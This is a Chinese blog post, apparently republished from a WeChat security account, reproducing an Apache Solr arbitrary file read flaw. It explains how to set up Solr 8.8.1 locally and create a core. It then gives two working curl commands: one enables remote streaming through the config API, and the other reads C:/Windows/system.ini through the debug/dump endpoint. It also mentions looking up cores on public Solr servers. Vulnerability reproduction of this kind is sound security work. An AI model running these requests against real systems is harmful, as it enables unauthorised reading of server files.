环境搭建
下载地址:http://archive.apache.org/dist/lucene/solr/
下载最新版8.8.1
启动:进入bin
目录,solr.cmd start -p 8983
-p
指定端口。
关闭服务:solr.cmd stop -p 8983
.
查看/创建Core
新安装的Solr没有任何core,可以使用如下方法创建一个Core:
如果你们有使用示例的配置启动Solr,需要创建一个Core,以便能够索引和查询。可以通过执行下面的命令来完成:
1 solr.cmd create -c <name>
这个命令会创建一个Core,使用数据驱动Schema,它会在你添加文档做索引后尝试推断正确的字段类别。
访问接口:http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json
接口可以查看官方文档:https://solr.apache.org/guide/8_8/coreadmin-api.html
成功看到创建的core:testcore
。
查看公网上某个solr的core:
漏洞复现
step 1
curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://127.0.0.1:8983/solr/testcore/config -H 'Content-type:application/json'
将上面的testcore
换成你创建的core/存在的core名称。
出现如上内容说明存在漏洞。如果返回结果是404,说明请求的core名称不对。
step 2
curl "http://127.0.0.1:8983/solr/testcore/debug/dump?param=ContentStreams" -F "stream.url=file:///
C:/Windows/system.ini"
参考连接
https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ
https://mp.weixin.qq.com/s/2D3bLaUVD6Lz7VqRu8dOGA
https://www.cnblogs.com/chen108/p/6196239.html
原文始发于微信公众号(信安文摘):【漏洞复现】1Day Apache Solr全版本任意文件读取(官方拒绝修复)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论